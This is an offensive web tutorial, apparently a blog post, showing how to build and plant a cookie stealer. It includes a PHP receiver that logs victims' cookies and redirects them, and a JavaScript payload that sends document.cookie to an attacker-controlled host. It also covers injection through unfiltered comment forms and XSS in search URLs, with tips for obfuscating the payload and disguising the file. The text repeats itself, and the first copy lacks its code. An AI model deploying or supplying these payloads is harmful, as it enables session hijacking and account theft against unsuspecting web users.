A cookie stealer is used to steal the login information of any unsuspecting victim. Once the link is visited, the cookie of the user is taken and stored in a text file. They are then redirected to another page without knowing what has just happened. This cookie stealer will be made using PHP, so to begin with you will need a free host with PHP support. There are many out there so I wont give any examples. Once you have your host it's time to begin.
A cookie stealer is made up of a sender and a receiver. The sender is done using JavaScript so will work on almost any site providing the user has JavaScript turned on. The receiver is placed on your site and takes the cookie from the JavaScript cookie sender. Here is the receiver code for your PHP file:
There are 3 parts of this code that are highlighted.
The first is the letter "c", this is the name of get command the PHP file uses to get the cookie (/script.php?c=...) If you are trying to hide what the script is doing, this can be called anything. If you change this though, the script below must be changed to fit.
The second and third are the name of the log file it creates when the cookie is received and where it redirects the user to after the log file has been stored.
Next is the Javascript receiver:
Again you have to change the URL to fit the actual location and name of your PHP script. Also, if you have changed the GET variable name (c) this must be changed too.
Add that to the site and as soon as it loads, the cookie is stolen. It would be a lot better to name the PHP page to look like part of the site your are infecting e.g. out.php maybe. That's all there is to building a basic cookie stealer. If you want to go more advanced and have a host with sendmail enabled you could make the script email you the cookie log as soon as it arrives.
How cookie stealers are used?
Just before finishing this tutorial it would useful to mention the most common infection methods. The first is finding a post comment form or guestbook or any web form that doesn't filter what the user enters, allowing you to enter the above JavaScript into the comment field. This is a relatively simple method.
Then there is also posting the link on basic forums that allow you to do so making sure the link is hidden or submitting the link to a site.
The next is through XSS . permanent XSS is easy its just the same again, but temporary XSS can be used as well. Say you have a search engine that is vulnerable and the format is:
You could add the script straight to it
Although this does look pretty obvious. Possibly making use of encrypting using hex then using Javascript's document.write or using unescape will make it virtually unrecognisable though.
Links
http://www.nickciske.com/tools/hex.php
Hex encoder/decoder
http://www.java2s.com/Code/JavaScript/Security/UnescapeEncoderDecode.htm
JavaScript unescape encoder/decoder
And that's all there is to this tutorial. Now you should also be able to recognize,create and avoid a cookie stealer if one is directed towards you....
A cookie stealer is made up of a sender and a receiver. The sender is done using JavaScript so will work on almost any site providing the user has JavaScript turned on. The receiver is placed on your site and takes the cookie from the JavaScript cookie sender. Here is the receiver code for your PHP file:
<?php
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";
?>
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";
?>
There are 3 parts of this code that are highlighted.
The first is the letter "c", this is the name of get command the PHP file uses to get the cookie (/script.php?c=...) If you are trying to hide what the script is doing, this can be called anything. If you change this though, the script below must be changed to fit.
The second and third are the name of the log file it creates when the cookie is received and where it redirects the user to after the log file has been stored.
Next is the Javascript receiver:
<script language="JavaScript">
document.location= "http://www.yoursite.com/stealer.php?c=" + document.cookie; </script>
document.location= "http://www.yoursite.com/stealer.php?c=" + document.cookie; </script>
Again you have to change the URL to fit the actual location and name of your PHP script. Also, if you have changed the GET variable name (c) this must be changed too.
Add that to the site and as soon as it loads, the cookie is stolen. It would be a lot better to name the PHP page to look like part of the site your are infecting e.g. out.php maybe. That's all there is to building a basic cookie stealer. If you want to go more advanced and have a host with sendmail enabled you could make the script email you the cookie log as soon as it arrives.
How cookie stealers are used?
Just before finishing this tutorial it would useful to mention the most common infection methods. The first is finding a post comment form or guestbook or any web form that doesn't filter what the user enters, allowing you to enter the above JavaScript into the comment field. This is a relatively simple method.
Then there is also posting the link on basic forums that allow you to do so making sure the link is hidden or submitting the link to a site.
The next is through XSS . permanent XSS is easy its just the same again, but temporary XSS can be used as well. Say you have a search engine that is vulnerable and the format is:
Search.php?q=search_here
You could add the script straight to it
Search.php?q=<script language="JavaScript">document.location= "http://www.yoursite.com/stealer.php?c=" + document.cookie;</script>
Links
http://www.nickciske.com/tools/hex.php
Hex encoder/decoder
http://www.java2s.com/Code/JavaScript/Security/UnescapeEncoderDecode.htm
JavaScript unescape encoder/decoder
And that's all there is to this tutorial. Now you should also be able to recognize,create and avoid a cookie stealer if one is directed towards you....
0 comments :
Post a Comment